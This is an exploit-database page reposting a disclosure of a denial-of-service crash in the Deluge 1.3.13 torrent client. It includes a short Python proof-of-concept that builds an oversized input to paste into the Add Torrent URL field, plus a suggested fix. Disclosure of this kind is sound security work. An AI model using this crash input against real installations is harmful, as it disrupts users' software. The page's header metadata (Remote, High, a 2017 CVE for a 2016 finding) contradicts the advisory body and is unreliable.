Advertisement






Deluge 1.3.13 - Denial Of Service Vulnerability

CVE Category Price Severity
CVE-2017-0948 CWE-399 $1,000-$5,000 High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2016-10-20
CPE
cpe:cpe:/a:deluge:deluge:1.3.13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016100186

Below is a copy:

Deluge 1.3.13 - Denial Of Service Vulnerability=====================================================
[#] Exploit Title : Deluge 1.3.13 - Denial Of Service Vulnerability
[#] Date Discovered : 2016-10-18
[#] Affected Product(s):  Deluge v1.3.13 - Software
[#] Exploitation Technique: Local
[#] Severity Level: Low
[#] Tested OS : Windows 10
=====================================================


[#] Product & Service Introduction:
===================================
Deluge is free software, licensed under the GNU GPL4, BitTorrent network node. Based on Python and GTK +.
The program uses the C ++ libtorrent as its own interface for network functionality through the torrent own Python bindings for the project.

(Copy of the Vendor Homepage: http://deluge-torrent.org/ )


[#] Technical Details & Description:
====================================
A denial of service vulnerability is detected in the official Deluge v1.3.13 - Software.
Local attackers can crash the software process via denial of service vulnerability.

Vulnerable Module(s):
[+]  Fiel > Add torrent > Url > Name of the window "Since the Internet address" > URL (Input)


[#] Proof of Concept (PoC):
===========================
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the local vulnerability ...
1. Run the script in python
2. Run the software Deluge.exe
3. Click `file`,` Add Torrent`, `Url`
4. Copy the characters that it is in the file `PoC.txt`
5. Glue the input characters in `URL` and click confirm
6. The crash software with success

-- PoC Exploit Python --

#!/usr/bin/python

junk = "\x41" * 6000
junk1 = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
exploit = junk + junk1

try:
    print "[+] Creating POC"
    crash = open('PoC.txt','w');
    crash.write(exploit);
    crash.close();
except:
    print "[-] No Permissions.."


[#] Solution - Fix & Patch:
===========================
Restrict the number of characters in input URL


[#] Disclaimer:
===============
Domain:     www.zwx.fr
Contact:    [email protected]
Social:     twitter.com/XSSed.fr
Feeds:      www.zwx.fr/feed/
Advisory:   www.vulnerability-lab.com/show.php?user=ZwX
            packetstormsecurity.com/files/author/12026/
            cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
            0day.today/author/27461


                     Copyright  2016 | ZwX - Security Researcher (Software & web application)


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum